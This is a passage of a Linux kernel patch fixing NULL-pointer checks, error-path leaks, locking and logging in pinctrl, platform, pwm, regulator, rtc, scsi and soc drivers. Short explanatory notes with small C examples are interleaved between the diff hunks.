++		break;
+ 	}
+ 
+ 	default:
+diff --git a/drivers/pinctrl/nuvoton/pinctrl-npcm7xx.c b/drivers/pinctrl/nuvoton/pinctrl-npcm7xx.c
+index 1c4e89b046de1..ac4c69132fa03 100644
+--- a/drivers/pinctrl/nuvoton/pinctrl-npcm7xx.c
++++ b/drivers/pinctrl/nuvoton/pinctrl-npcm7xx.c
+@@ -1878,6 +1878,8 @@ static int npcm7xx_gpio_of(struct npcm7xx_pinctrl *pctrl)
+ 		}
+ 
+ 		pctrl->gpio_bank[id].base = ioremap(res.start, resource_size(&res));
++		if (!pctrl->gpio_bank[id].base)
++			return -EINVAL;
+ 
+ 		ret = bgpio_init(&pctrl->gpio_bank[id].gc, dev, 4,
+ 				 pctrl->gpio_bank[id].base + NPCM7XX_GP_N_DIN,
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index 0b7cc6f063e00..f71c6457e3509 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1122,6 +1122,8 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 		/* Pin naming convention: P(bank_name)(bank_pin_number). */
+ 		pin_desc[i].name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "P%c%d",
+ 						  bank + 'A', line);
++		if (!pin_desc[i].name)
++			return -ENOMEM;
+ 
+ 		group->name = group_names[i] = pin_desc[i].name;
+ 		group->pin = pin_desc[i].number;
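Several hunks in this patch add the same missing check: devm_kasprintf() returns NULL on allocation failure, and the unchecked result is dereferenced later. A small sketch of the pattern using plain asprintf() as a stand-in (hypothetical example code, not the devm API):

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>

static int make_pin_name(char **name, char bank, int line)
{
	/* asprintf() reports failure with -1, leaving *name undefined. */
	if (asprintf(name, "P%c%d", bank, line) < 0)
		return -1;	/* propagate the -ENOMEM-style failure */
	return 0;
}

int main(void)
{
	char *name;

	if (make_pin_name(&name, 'A', 3) < 0)
		return 1;
	printf("pin: %s\n", name);	/* "PA3" */
	free(name);
	return 0;
}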
+diff --git a/drivers/pinctrl/pinctrl-microchip-sgpio.c b/drivers/pinctrl/pinctrl-microchip-sgpio.c
+index af27b72c89586..96a20ce94f5e9 100644
+--- a/drivers/pinctrl/pinctrl-microchip-sgpio.c
++++ b/drivers/pinctrl/pinctrl-microchip-sgpio.c
+@@ -816,6 +816,9 @@ static int microchip_sgpio_register_bank(struct device *dev,
+ 	pctl_desc->name = devm_kasprintf(dev, GFP_KERNEL, "%s-%sput",
+ 					 dev_name(dev),
+ 					 bank->is_input ? "in" : "out");
++	if (!pctl_desc->name)
++		return -ENOMEM;
++
+ 	pctl_desc->pctlops = &sgpio_pctl_ops;
+ 	pctl_desc->pmxops = &sgpio_pmx_ops;
+ 	pctl_desc->confops = &sgpio_confops;
+diff --git a/drivers/pinctrl/sunplus/sppctl.c b/drivers/pinctrl/sunplus/sppctl.c
+index 2b3335ab56c66..6b24fa0e63c0f 100644
+--- a/drivers/pinctrl/sunplus/sppctl.c
++++ b/drivers/pinctrl/sunplus/sppctl.c
+@@ -838,11 +838,6 @@ static int sppctl_dt_node_to_map(struct pinctrl_dev *pctldev, struct device_node
+ 	int i, size = 0;
+ 
+ 	list = of_get_property(np_config, "sunplus,pins", &size);
+-
+-	if (nmG <= 0)
+-		nmG = 0;
+-
+-	parent = of_get_parent(np_config);
+ 	*num_maps = size / sizeof(*list);
+ 
+ 	/*
+@@ -870,10 +865,14 @@ static int sppctl_dt_node_to_map(struct pinctrl_dev *pctldev, struct device_node
+ 		}
+ 	}
+ 
++	if (nmG <= 0)
++		nmG = 0;
++
+ 	*map = kcalloc(*num_maps + nmG, sizeof(**map), GFP_KERNEL);
+-	if (*map == NULL)
++	if (!(*map))
+ 		return -ENOMEM;
+ 
++	parent = of_get_parent(np_config);
+ 	for (i = 0; i < (*num_maps); i++) {
+ 		dt_pin = be32_to_cpu(list[i]);
+ 		pin_num = FIELD_GET(GENMASK(31, 24), dt_pin);
+@@ -887,6 +886,8 @@ static int sppctl_dt_node_to_map(struct pinctrl_dev *pctldev, struct device_node
+ 			(*map)[i].data.configs.num_configs = 1;
+ 			(*map)[i].data.configs.group_or_pin = pin_get_name(pctldev, pin_num);
+ 			configs = kmalloc(sizeof(*configs), GFP_KERNEL);
++			if (!configs)
++				goto sppctl_map_err;
+ 			*configs = FIELD_GET(GENMASK(7, 0), dt_pin);
+ 			(*map)[i].data.configs.configs = configs;
+ 
+@@ -900,6 +901,8 @@ static int sppctl_dt_node_to_map(struct pinctrl_dev *pctldev, struct device_node
+ 			(*map)[i].data.configs.num_configs = 1;
+ 			(*map)[i].data.configs.group_or_pin = pin_get_name(pctldev, pin_num);
+ 			configs = kmalloc(sizeof(*configs), GFP_KERNEL);
++			if (!configs)
++				goto sppctl_map_err;
+ 			*configs = SPPCTL_IOP_CONFIGS;
+ 			(*map)[i].data.configs.configs = configs;
+ 
+@@ -969,6 +972,14 @@ static int sppctl_dt_node_to_map(struct pinctrl_dev *pctldev, struct device_node
+ 	of_node_put(parent);
+ 	dev_dbg(pctldev->dev, "%d pins mapped\n", *num_maps);
+ 	return 0;
++
++sppctl_map_err:
++	for (i = 0; i < (*num_maps); i++)
++		if ((*map)[i].type == PIN_MAP_TYPE_CONFIGS_PIN)
++			kfree((*map)[i].data.configs.configs);
++	kfree(*map);
++	of_node_put(parent);
++	return -ENOMEM;
+ }
+ 
+ static const struct pinctrl_ops sppctl_pctl_ops = {
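The new sppctl_map_err label is the usual kernel goto-unwind idiom: when an allocation fails mid-loop, free every per-entry allocation made so far, then the containing array. A compact userspace sketch of the same unwind shape (names hypothetical):

#include <stdlib.h>

struct map_entry { int *configs; };

static int build_maps(struct map_entry **map, int n)
{
	int i;

	*map = calloc(n, sizeof(**map));
	if (!*map)
		return -1;

	for (i = 0; i < n; i++) {
		(*map)[i].configs = malloc(sizeof(int));
		if (!(*map)[i].configs)
			goto map_err;
	}
	return 0;

map_err:
	/* Unwind only what was successfully allocated. */
	while (i-- > 0)
		free((*map)[i].configs);
	free(*map);
	*map = NULL;
	return -1;
}

int main(void)
{
	struct map_entry *map;

	if (build_maps(&map, 4) == 0) {
		for (int i = 0; i < 4; i++)
			free(map[i].configs);
		free(map);
	}
	return 0;
}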
+diff --git a/drivers/platform/x86/dell/dell-rbtn.c b/drivers/platform/x86/dell/dell-rbtn.c
+index a89fad47ff139..d3b1cb73de97a 100644
+--- a/drivers/platform/x86/dell/dell-rbtn.c
++++ b/drivers/platform/x86/dell/dell-rbtn.c
+@@ -395,16 +395,16 @@ static int rbtn_add(struct acpi_device *device)
+ 		return -EINVAL;
+ 	}
+ 
++	rbtn_data = devm_kzalloc(&device->dev, sizeof(*rbtn_data), GFP_KERNEL);
++	if (!rbtn_data)
++		return -ENOMEM;
++
+ 	ret = rbtn_acquire(device, true);
+ 	if (ret < 0) {
+ 		dev_err(&device->dev, "Cannot enable device\n");
+ 		return ret;
+ 	}
+ 
+-	rbtn_data = devm_kzalloc(&device->dev, sizeof(*rbtn_data), GFP_KERNEL);
+-	if (!rbtn_data)
+-		return -ENOMEM;
+-
+ 	rbtn_data->type = type;
+ 	device->driver_data = rbtn_data;
+ 
+@@ -420,10 +420,12 @@ static int rbtn_add(struct acpi_device *device)
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
++		break;
+ 	}
++	if (ret)
++		rbtn_acquire(device, false);
+ 
+ 	return ret;
+-
+ }
+ 
+ static int rbtn_remove(struct acpi_device *device)
+@@ -442,7 +444,6 @@ static int rbtn_remove(struct acpi_device *device)
+ 	}
+ 
+ 	rbtn_acquire(device, false);
+-	device->driver_data = NULL;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/platform/x86/lenovo-yogabook-wmi.c b/drivers/platform/x86/lenovo-yogabook-wmi.c
+index 5f4bd1eec38a9..d57fcc8388519 100644
+--- a/drivers/platform/x86/lenovo-yogabook-wmi.c
++++ b/drivers/platform/x86/lenovo-yogabook-wmi.c
+@@ -2,7 +2,6 @@
+ /* WMI driver for Lenovo Yoga Book YB1-X90* / -X91* tablets */
+ 
+ #include <linux/acpi.h>
+-#include <linux/devm-helpers.h>
+ #include <linux/gpio/consumer.h>
+ #include <linux/gpio/machine.h>
+ #include <linux/interrupt.h>
+@@ -248,10 +247,7 @@ static int yogabook_wmi_probe(struct wmi_device *wdev, const void *context)
+ 	data->brightness = YB_KBD_BL_DEFAULT;
+ 	set_bit(YB_KBD_IS_ON, &data->flags);
+ 	set_bit(YB_DIGITIZER_IS_ON, &data->flags);
+-
+-	r = devm_work_autocancel(&wdev->dev, &data->work, yogabook_wmi_work);
+-	if (r)
+-		return r;
++	INIT_WORK(&data->work, yogabook_wmi_work);
+ 
+ 	data->kbd_adev = acpi_dev_get_first_match_dev("GDIX1001", NULL, -1);
+ 	if (!data->kbd_adev) {
+@@ -299,10 +295,12 @@ static int yogabook_wmi_probe(struct wmi_device *wdev, const void *context)
+ 	}
+ 	data->backside_hall_irq = r;
+ 
+-	r = devm_request_irq(&wdev->dev, data->backside_hall_irq,
+-			     yogabook_backside_hall_irq,
+-			     IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING,
+-			     "backside_hall_sw", data);
++	/* Set default brightness before enabling the IRQ */
++	yogabook_wmi_set_kbd_backlight(data->wdev, YB_KBD_BL_DEFAULT);
++
++	r = request_irq(data->backside_hall_irq, yogabook_backside_hall_irq,
++			IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING,
++			"backside_hall_sw", data);
+ 	if (r) {
+ 		dev_err_probe(&wdev->dev, r, "Requesting backside_hall_sw IRQ\n");
+ 		goto error_put_devs;
+@@ -318,11 +316,14 @@ static int yogabook_wmi_probe(struct wmi_device *wdev, const void *context)
+ 	r = devm_led_classdev_register(&wdev->dev, &data->kbd_bl_led);
+ 	if (r < 0) {
+ 		dev_err_probe(&wdev->dev, r, "Registering backlight LED device\n");
+-		goto error_put_devs;
++		goto error_free_irq;
+ 	}
+ 
+ 	return 0;
+ 
++error_free_irq:
++	free_irq(data->backside_hall_irq, data);
++	cancel_work_sync(&data->work);
+ error_put_devs:
+ 	put_device(data->dig_dev);
+ 	put_device(data->kbd_dev);
+@@ -334,6 +335,19 @@ error_put_devs:
+ static void yogabook_wmi_remove(struct wmi_device *wdev)
+ {
+ 	struct yogabook_wmi *data = dev_get_drvdata(&wdev->dev);
++	int r = 0;
++
++	free_irq(data->backside_hall_irq, data);
++	cancel_work_sync(&data->work);
++
++	if (!test_bit(YB_KBD_IS_ON, &data->flags))
++		r |= device_reprobe(data->kbd_dev);
++
++	if (!test_bit(YB_DIGITIZER_IS_ON, &data->flags))
++		r |= device_reprobe(data->dig_dev);
++
++	if (r)
++		dev_warn(&wdev->dev, "Reprobe of devices failed\n");
+ 
+ 	put_device(data->dig_dev);
+ 	put_device(data->kbd_dev);
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index 336b9029d1515..3cbb92b6c5215 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -14,6 +14,7 @@
+ #include <linux/acpi.h>
+ #include <linux/errno.h>
+ #include <linux/fs.h>
++#include <linux/mutex.h>
+ #include <linux/string.h>
+ #include <linux/types.h>
+ #include <linux/dmi.h>
+@@ -171,7 +172,7 @@ MODULE_PARM_DESC(debug_support, "Enable debug command support");
+ #define TLMI_POP_PWD (1 << 0)
+ #define TLMI_PAP_PWD (1 << 1)
+ #define TLMI_HDD_PWD (1 << 2)
+-#define TLMI_SYS_PWD (1 << 3)
++#define TLMI_SMP_PWD (1 << 6) /* System Management */
+ #define TLMI_CERT    (1 << 7)
+ 
+ #define to_tlmi_pwd_setting(kobj)  container_of(kobj, struct tlmi_pwd_setting, kobj)
+@@ -195,6 +196,7 @@ static const char * const level_options[] = {
+ };
+ static struct think_lmi tlmi_priv;
+ static struct class *fw_attr_class;
++static DEFINE_MUTEX(tlmi_mutex);
+ 
+ /* ------ Utility functions ------------*/
+ /* Strip out CR if one is present */
+@@ -437,6 +439,9 @@ static ssize_t new_password_store(struct kobject *kobj,
+ 	/* Strip out CR if one is present, setting password won't work if it is present */
+ 	strip_cr(new_pwd);
+ 
++	/* Use lock in case multiple WMI operations are needed */
++	mutex_lock(&tlmi_mutex);
++
+ 	pwdlen = strlen(new_pwd);
+ 	/* pwdlen == 0 is allowed to clear the password */
+ 	if (pwdlen && ((pwdlen < setting->minlen) || (pwdlen > setting->maxlen))) {
+@@ -456,9 +461,9 @@ static ssize_t new_password_store(struct kobject *kobj,
+ 				sprintf(pwd_type, "mhdp%d", setting->index);
+ 		} else if (setting == tlmi_priv.pwd_nvme) {
+ 			if (setting->level == TLMI_LEVEL_USER)
+-				sprintf(pwd_type, "unvp%d", setting->index);
++				sprintf(pwd_type, "udrp%d", setting->index);
+ 			else
+-				sprintf(pwd_type, "mnvp%d", setting->index);
++				sprintf(pwd_type, "adrp%d", setting->index);
+ 		} else {
+ 			sprintf(pwd_type, "%s", setting->pwd_type);
+ 		}
+@@ -493,6 +498,7 @@ static ssize_t new_password_store(struct kobject *kobj,
+ 		kfree(auth_str);
+ 	}
+ out:
++	mutex_unlock(&tlmi_mutex);
+ 	kfree(new_pwd);
+ 	return ret ?: count;
+ }
+@@ -982,6 +988,9 @@ static ssize_t current_value_store(struct kobject *kobj,
+ 	/* Strip out CR if one is present */
+ 	strip_cr(new_setting);
+ 
++	/* Use lock in case multiple WMI operations are needed */
++	mutex_lock(&tlmi_mutex);
++
+ 	/* Check if certificate authentication is enabled and active */
+ 	if (tlmi_priv.certificate_support && tlmi_priv.pwd_admin->cert_installed) {
+ 		if (!tlmi_priv.pwd_admin->signature || !tlmi_priv.pwd_admin->save_signature) {
+@@ -1040,6 +1049,7 @@ static ssize_t current_value_store(struct kobject *kobj,
+ 		kobject_uevent(&tlmi_priv.class_dev->kobj, KOBJ_CHANGE);
+ 	}
+ out:
++	mutex_unlock(&tlmi_mutex);
+ 	kfree(auth_str);
+ 	kfree(set_str);
+ 	kfree(new_setting);
+@@ -1512,11 +1522,11 @@ static int tlmi_analyze(void)
+ 		tlmi_priv.pwd_power->valid = true;
+ 
+ 	if (tlmi_priv.opcode_support) {
+-		tlmi_priv.pwd_system = tlmi_create_auth("sys", "system");
++		tlmi_priv.pwd_system = tlmi_create_auth("smp", "system");
+ 		if (!tlmi_priv.pwd_system)
+ 			goto fail_clear_attr;
+ 
+-		if (tlmi_priv.pwdcfg.core.password_state & TLMI_SYS_PWD)
++		if (tlmi_priv.pwdcfg.core.password_state & TLMI_SMP_PWD)
+ 			tlmi_priv.pwd_system->valid = true;
+ 
+ 		tlmi_priv.pwd_hdd = tlmi_create_auth("hdd", "hdd");
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 5b2c8dd2861b7..e7ece2738de94 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10528,8 +10528,8 @@ unlock:
+ static void dytc_profile_refresh(void)
+ {
+ 	enum platform_profile_option profile;
+-	int output, err = 0;
+-	int perfmode, funcmode;
++	int output = 0, err = 0;
++	int perfmode, funcmode = 0;
+ 
+ 	mutex_lock(&dytc_mutex);
+ 	if (dytc_capabilities & BIT(DYTC_FC_MMC)) {
+@@ -10542,6 +10542,8 @@ static void dytc_profile_refresh(void)
+ 		err = dytc_command(DYTC_CMD_GET, &output);
+ 		/* Check if we are PSC mode, or have AMT enabled */
+ 		funcmode = (output >> DYTC_GET_FUNCTION_BIT) & 0xF;
++	} else { /* Unknown profile mode */
++		err = -ENODEV;
+ 	}
+ 	mutex_unlock(&dytc_mutex);
+ 	if (err)
+diff --git a/drivers/powercap/Kconfig b/drivers/powercap/Kconfig
+index 515e3ceb3393a..863e240b37e01 100644
+--- a/drivers/powercap/Kconfig
++++ b/drivers/powercap/Kconfig
+@@ -18,10 +18,12 @@ if POWERCAP
+ # Client driver configurations go here.
+ config INTEL_RAPL_CORE
+ 	tristate
++	depends on PCI
++	select IOSF_MBI
+ 
+ config INTEL_RAPL
+ 	tristate "Intel RAPL Support via MSR Interface"
+-	depends on X86 && IOSF_MBI
++	depends on X86 && PCI
+ 	select INTEL_RAPL_CORE
+ 	help
+ 	  This enables support for the Intel Running Average Power Limit (RAPL)
+diff --git a/drivers/powercap/intel_rapl_msr.c b/drivers/powercap/intel_rapl_msr.c
+index bc6adda588835..65adb4cbaaf8e 100644
+--- a/drivers/powercap/intel_rapl_msr.c
++++ b/drivers/powercap/intel_rapl_msr.c
+@@ -22,7 +22,6 @@
+ #include <linux/processor.h>
+ #include <linux/platform_device.h>
+ 
+-#include <asm/iosf_mbi.h>
+ #include <asm/cpu_device_id.h>
+ #include <asm/intel-family.h>
+ 
+diff --git a/drivers/pwm/pwm-ab8500.c b/drivers/pwm/pwm-ab8500.c
+index ad37bc46f2721..5fa91f4cda7ac 100644
+--- a/drivers/pwm/pwm-ab8500.c
++++ b/drivers/pwm/pwm-ab8500.c
+@@ -96,7 +96,7 @@ static int ab8500_pwm_probe(struct platform_device *pdev)
+ 	int err;
+ 
+ 	if (pdev->id < 1 || pdev->id > 31)
+-		return dev_err_probe(&pdev->dev, EINVAL, "Invalid device id %d\n", pdev->id);
++		return dev_err_probe(&pdev->dev, -EINVAL, "Invalid device id %d\n", pdev->id);
+ 
+ 	/*
+ 	 * Nothing to be done in probe, this is required to get the
+diff --git a/drivers/pwm/pwm-imx-tpm.c b/drivers/pwm/pwm-imx-tpm.c
+index ed1aad96fff04..318dc0be974b4 100644
+--- a/drivers/pwm/pwm-imx-tpm.c
++++ b/drivers/pwm/pwm-imx-tpm.c
+@@ -399,6 +399,13 @@ static int __maybe_unused pwm_imx_tpm_suspend(struct device *dev)
+ 	if (tpm->enable_count > 0)
+ 		return -EBUSY;
+ 
++	/*
++	 * Force 'real_period' to zero so that the period update code
++	 * runs again after system resume, since suspend resets the
++	 * period-related registers to their default values.
++	 */
++	tpm->real_period = 0;
++
+ 	clk_disable_unprepare(tpm->clk);
+ 
+ 	return 0;
+diff --git a/drivers/pwm/pwm-mtk-disp.c b/drivers/pwm/pwm-mtk-disp.c
+index 3811578fcff05..db286284f3ee0 100644
+--- a/drivers/pwm/pwm-mtk-disp.c
++++ b/drivers/pwm/pwm-mtk-disp.c
+@@ -79,14 +79,11 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	if (state->polarity != PWM_POLARITY_NORMAL)
+ 		return -EINVAL;
+ 
+-	if (!state->enabled) {
+-		mtk_disp_pwm_update_bits(mdp, DISP_PWM_EN, mdp->data->enable_mask,
+-					 0x0);
+-
+-		if (mdp->enabled) {
+-			clk_disable_unprepare(mdp->clk_mm);
+-			clk_disable_unprepare(mdp->clk_main);
+-		}
++	if (!state->enabled && mdp->enabled) {
++		mtk_disp_pwm_update_bits(mdp, DISP_PWM_EN,
++					 mdp->data->enable_mask, 0x0);
++		clk_disable_unprepare(mdp->clk_mm);
++		clk_disable_unprepare(mdp->clk_main);
+ 
+ 		mdp->enabled = false;
+ 		return 0;
+diff --git a/drivers/pwm/sysfs.c b/drivers/pwm/sysfs.c
+index e7db8e45001cf..ba125253857ea 100644
+--- a/drivers/pwm/sysfs.c
++++ b/drivers/pwm/sysfs.c
+@@ -424,6 +424,13 @@ static int pwm_class_resume_npwm(struct device *parent, unsigned int npwm)
+ 		if (!export)
+ 			continue;
+ 
++		/* If pwmchip was not enabled before suspend, do nothing. */
++		if (!export->suspend.enabled) {
++			/* release lock taken in pwm_class_get_state */
++			mutex_unlock(&export->lock);
++			continue;
++		}
++
+ 		state.enabled = export->suspend.enabled;
+ 		ret = pwm_class_apply_state(export, pwm, &state);
+ 		if (ret < 0)
+@@ -448,7 +455,17 @@ static int pwm_class_suspend(struct device *parent)
+ 		if (!export)
+ 			continue;
+ 
++		/*
++		 * If pwmchip was not enabled before suspend, save
++		 * state for resume time and do nothing else.
++		 */
+ 		export->suspend = state;
++		if (!state.enabled) {
++			/* release lock taken in pwm_class_get_state */
++			mutex_unlock(&export->lock);
++			continue;
++		}
++
+ 		state.enabled = false;
+ 		ret = pwm_class_apply_state(export, pwm, &state);
+ 		if (ret < 0) {
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index e01cade8be0c7..351f0fd225b14 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -1918,19 +1918,17 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 
+ 	if (err != -EEXIST)
+ 		regulator->debugfs = debugfs_create_dir(supply_name, rdev->debugfs);
+-	if (!regulator->debugfs) {
++	if (IS_ERR(regulator->debugfs))
+ 		rdev_dbg(rdev, "Failed to create debugfs directory\n");
+-	} else {
+-		debugfs_create_u32("uA_load", 0444, regulator->debugfs,
+-				   &regulator->uA_load);
+-		debugfs_create_u32("min_uV", 0444, regulator->debugfs,
+-				   &regulator->voltage[PM_SUSPEND_ON].min_uV);
+-		debugfs_create_u32("max_uV", 0444, regulator->debugfs,
+-				   &regulator->voltage[PM_SUSPEND_ON].max_uV);
+-		debugfs_create_file("constraint_flags", 0444,
+-				    regulator->debugfs, regulator,
+-				    &constraint_flags_fops);
+-	}
++
++	debugfs_create_u32("uA_load", 0444, regulator->debugfs,
++			   &regulator->uA_load);
++	debugfs_create_u32("min_uV", 0444, regulator->debugfs,
++			   &regulator->voltage[PM_SUSPEND_ON].min_uV);
++	debugfs_create_u32("max_uV", 0444, regulator->debugfs,
++			   &regulator->voltage[PM_SUSPEND_ON].max_uV);
++	debugfs_create_file("constraint_flags", 0444, regulator->debugfs,
++			    regulator, &constraint_flags_fops);
+ 
+ 	/*
+ 	 * Check now if the regulator is an always on regulator - if
+@@ -5257,10 +5255,8 @@ static void rdev_init_debugfs(struct regulator_dev *rdev)
+ 	}
+ 
+ 	rdev->debugfs = debugfs_create_dir(rname, debugfs_root);
+-	if (IS_ERR(rdev->debugfs)) {
+-		rdev_warn(rdev, "Failed to create debugfs directory\n");
+-		return;
+-	}
++	if (IS_ERR(rdev->debugfs))
++		rdev_dbg(rdev, "Failed to create debugfs directory\n");
+ 
+ 	debugfs_create_u32("use_count", 0444, rdev->debugfs,
+ 			   &rdev->use_count);
+@@ -6180,7 +6176,7 @@ static int __init regulator_init(void)
+ 
+ 	debugfs_root = debugfs_create_dir("regulator", NULL);
+ 	if (IS_ERR(debugfs_root))
+-		pr_warn("regulator: Failed to create debugfs directory\n");
++		pr_debug("regulator: Failed to create debugfs directory\n");
+ 
+ #ifdef CONFIG_DEBUG_FS
+ 	debugfs_create_file("supply_map", 0444, debugfs_root, NULL,
+diff --git a/drivers/regulator/tps65219-regulator.c b/drivers/regulator/tps65219-regulator.c
+index 58f6541b6417b..b0d8d6fed24d5 100644
+--- a/drivers/regulator/tps65219-regulator.c
++++ b/drivers/regulator/tps65219-regulator.c
+@@ -289,13 +289,13 @@ static irqreturn_t tps65219_regulator_irq_handler(int irq, void *data)
+ 
+ static int tps65219_get_rdev_by_name(const char *regulator_name,
+ 				     struct regulator_dev *rdevtbl[7],
+-				     struct regulator_dev *dev)
++				     struct regulator_dev **dev)
+ {
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(regulators); i++) {
+ 		if (strcmp(regulator_name, regulators[i].name) == 0) {
+-			dev = rdevtbl[i];
++			*dev = rdevtbl[i];
+ 			return 0;
+ 		}
+ 	}
+@@ -348,7 +348,7 @@ static int tps65219_regulator_probe(struct platform_device *pdev)
+ 		irq_data[i].dev = tps->dev;
+ 		irq_data[i].type = irq_type;
+ 
+-		tps65219_get_rdev_by_name(irq_type->regulator_name, rdevtbl, rdev);
++		tps65219_get_rdev_by_name(irq_type->regulator_name, rdevtbl, &rdev);
+ 		if (IS_ERR(rdev)) {
+ 			dev_err(tps->dev, "Failed to get rdev for %s\n",
+ 				irq_type->regulator_name);
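The tps65219 fix is a pure C pointer bug: with "struct regulator_dev *dev" the callee only overwrites its local copy of the argument, so the caller's rdev stays unset; writing through "struct regulator_dev **dev" reaches the caller. A minimal demonstration:

#include <assert.h>
#include <stddef.h>

struct rdev { int id; };

/* Broken: assigns to the local parameter copy; the caller sees nothing. */
static void get_rdev_broken(struct rdev *table, struct rdev *out)
{
	out = &table[1];
	(void)out;
}

/* Fixed: writes through a pointer-to-pointer. */
static void get_rdev_fixed(struct rdev *table, struct rdev **out)
{
	*out = &table[1];
}

int main(void)
{
	struct rdev table[2] = { { 0 }, { 1 } };
	struct rdev *r = NULL;

	get_rdev_broken(table, r);
	assert(r == NULL);		/* still NULL: the bug */

	get_rdev_fixed(table, &r);
	assert(r == &table[1]);		/* now reaches the caller */
	return 0;
}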
+diff --git a/drivers/rtc/rtc-st-lpc.c b/drivers/rtc/rtc-st-lpc.c
+index 0f8e4231098ef..d04d46f9cc65a 100644
+--- a/drivers/rtc/rtc-st-lpc.c
++++ b/drivers/rtc/rtc-st-lpc.c
+@@ -228,7 +228,7 @@ static int st_rtc_probe(struct platform_device *pdev)
+ 	enable_irq_wake(rtc->irq);
+ 	disable_irq(rtc->irq);
+ 
+-	rtc->clk = clk_get(&pdev->dev, NULL);
++	rtc->clk = devm_clk_get(&pdev->dev, NULL);
+ 	if (IS_ERR(rtc->clk)) {
+ 		dev_err(&pdev->dev, "Unable to request clock\n");
+ 		return PTR_ERR(rtc->clk);
+diff --git a/drivers/s390/net/qeth_l3_sys.c b/drivers/s390/net/qeth_l3_sys.c
+index 1082380b21f85..dba9b307020cb 100644
+--- a/drivers/s390/net/qeth_l3_sys.c
++++ b/drivers/s390/net/qeth_l3_sys.c
+@@ -652,7 +652,7 @@ static QETH_DEVICE_ATTR(vipa_add4, add4, 0644,
+ static ssize_t qeth_l3_dev_vipa_del4_store(struct device *dev,
+ 		struct device_attribute *attr, const char *buf, size_t count)
+ {
+-	return qeth_l3_vipa_store(dev, buf, true, count, QETH_PROT_IPV4);
++	return qeth_l3_vipa_store(dev, buf, false, count, QETH_PROT_IPV4);
+ }
+ 
+ static QETH_DEVICE_ATTR(vipa_del4, del4, 0200, NULL,
+diff --git a/drivers/scsi/3w-xxxx.c b/drivers/scsi/3w-xxxx.c
+index ffdecb12d654c..9bd70e4618d52 100644
+--- a/drivers/scsi/3w-xxxx.c
++++ b/drivers/scsi/3w-xxxx.c
+@@ -2305,8 +2305,10 @@ static int tw_probe(struct pci_dev *pdev, const struct pci_device_id *dev_id)
+ 	TW_DISABLE_INTERRUPTS(tw_dev);
+ 
+ 	/* Initialize the card */
+-	if (tw_reset_sequence(tw_dev))
++	if (tw_reset_sequence(tw_dev)) {
++		retval = -EINVAL;
+ 		goto out_release_mem_region;
++	}
+ 
+ 	/* Set host specific parameters */
+ 	host->max_id = TW_MAX_UNITS;
+diff --git a/drivers/scsi/lpfc/lpfc_els.c b/drivers/scsi/lpfc/lpfc_els.c
+index ddd5949d8fc01..e21c73a3803ec 100644
+--- a/drivers/scsi/lpfc/lpfc_els.c
++++ b/drivers/scsi/lpfc/lpfc_els.c
+@@ -5413,9 +5413,19 @@ out:
+ 				ndlp->nlp_flag &= ~NLP_RELEASE_RPI;
+ 				spin_unlock_irq(&ndlp->lock);
+ 			}
++			lpfc_drop_node(vport, ndlp);
++		} else if (ndlp->nlp_state != NLP_STE_PLOGI_ISSUE &&
++			   ndlp->nlp_state != NLP_STE_REG_LOGIN_ISSUE &&
++			   ndlp->nlp_state != NLP_STE_PRLI_ISSUE) {
++			/* Drop ndlp if there is no planned or outstanding
++			 * issued PRLI.
++			 *
++			 * In cases when the ndlp is acting as both an initiator
++			 * and target function, let our issued PRLI determine
++			 * the final ndlp kref drop.
++			 */
++			lpfc_drop_node(vport, ndlp);
+ 		}
+-
+-		lpfc_drop_node(vport, ndlp);
+ 	}
+ 
+ 	/* Release the originating I/O reference. */
+diff --git a/drivers/scsi/qedf/qedf_main.c b/drivers/scsi/qedf/qedf_main.c
+index e045c6e250902..ecff2ec83a002 100644
+--- a/drivers/scsi/qedf/qedf_main.c
++++ b/drivers/scsi/qedf/qedf_main.c
+@@ -3046,9 +3046,8 @@ static int qedf_alloc_global_queues(struct qedf_ctx *qedf)
+ 	 * addresses of our queues
+ 	 */
+ 	if (!qedf->p_cpuq) {
+-		status = -EINVAL;
+ 		QEDF_ERR(&qedf->dbg_ctx, "p_cpuq is NULL.\n");
+-		goto mem_alloc_failure;
++		return -EINVAL;
+ 	}
+ 
+ 	qedf->global_queues = kzalloc((sizeof(struct global_queue *)
+diff --git a/drivers/soc/amlogic/meson-secure-pwrc.c b/drivers/soc/amlogic/meson-secure-pwrc.c
+index e935187635267..25b4b71df9b89 100644
+--- a/drivers/soc/amlogic/meson-secure-pwrc.c
++++ b/drivers/soc/amlogic/meson-secure-pwrc.c
+@@ -105,7 +105,7 @@ static struct meson_secure_pwrc_domain_desc a1_pwrc_domains[] = {
+ 	SEC_PD(ACODEC,	0),
+ 	SEC_PD(AUDIO,	0),
+ 	SEC_PD(OTP,	0),
+-	SEC_PD(DMA,	0),
++	SEC_PD(DMA,	GENPD_FLAG_ALWAYS_ON | GENPD_FLAG_IRQ_SAFE),
+ 	SEC_PD(SD_EMMC,	0),
+ 	SEC_PD(RAMA,	0),
+ 	/* SRAMB is used as ATF runtime memory, and should be always on */
+diff --git a/drivers/soc/fsl/qe/Kconfig b/drivers/soc/fsl/qe/Kconfig
+index 357c5800b112f..7afa796dbbb89 100644
+--- a/drivers/soc/fsl/qe/Kconfig
++++ b/drivers/soc/fsl/qe/Kconfig
